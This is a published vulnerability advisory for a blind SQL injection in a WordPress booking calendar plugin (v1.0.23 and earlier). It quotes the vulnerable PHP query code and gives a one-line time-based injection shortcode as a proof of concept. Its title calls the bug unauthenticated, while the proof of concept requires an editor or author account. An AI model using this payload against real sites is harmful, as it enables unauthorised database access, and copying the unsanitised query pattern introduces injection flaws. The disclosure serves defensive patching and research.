# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Unauthenticated blind SQL injection # Date: 2016-02-08 # Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form # Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ] # Vendor Homepage: http://wordpress.dwbooster.com/ # Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form # Version: 1.0.23 # Tested on: windows 10 + firefox. ============== Description ============== Create a booking form with a reservation calendar or a classic contact form, connected to a PayPal payment button. With the **Booking Calendar Contact Form** you can create a **classic contact form** or a **booking form with a reservation calendar**, connected to a PayPal payment button. The reservation calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates. The **reservation calendar** is an optional item, so it can be disabled to create a **general purpose contact form**. There are two types of bookings available in the calendar configuration: full day bookings or partial day bookings. With full day bookings the whole day is blocked / reserved while in partial day bookings the start and end dates are partially blocked as used for example in **room/hotel bookings**. =================== Technical details =================== Booking calendar plugin is prone to a blind sql injection in the shortcode function ´dex_bccf_filter_content´ because there is not sanitization when the variable ´DEX_BCCF_CALENDAR_FIXED_ID´ is asigned and then is used into function ´dex_bccf_get_public_form()´. function dex_bccf_filter_content($atts) { ... extract(shortcode_atts(array( 'calendar' => '', 'user' => '', ), $atts)); if ($calendar != '') define('DEX_BCCF_CALENDAR_FIXED_ID', $calendar); .. return $buffered_contents; } function dex_bccf_get_public_form() { global $wpdb; if (defined('DEX_CALENDAR_USER') && DEX_CALENDAR_USER != 0) $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME . " WHERE conwer=" . DEX_CALENDAR_USER); else if (defined('DEX_BCCF_CALENDAR_FIXED_ID')) $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME . " WHERE id=" . DEX_BCCF_CALENDAR_FIXED_ID); else $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME); ... } ================== Proof of concept ================== An editor/author can add a ahortcode with his sql command into a post: [CP_BCCF_FORM calendar=-1 or sleep(10)#] ========== CREDITS ========== Vulnerability discovered by: Joaquin Ramirez Martinez [i0 security-lab] joaquin.ramirez.mtz.lab[at]gmail[dot]com https://www.facebook.com/I0-security-lab-524954460988147/ https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q ======== TIMELINE ======== 2016-02-01 vulnerability discovered 2016-02-05 reported to vendor 2016-02-08 released fixed plugin v1.0.24 2016-02-08 public disclosure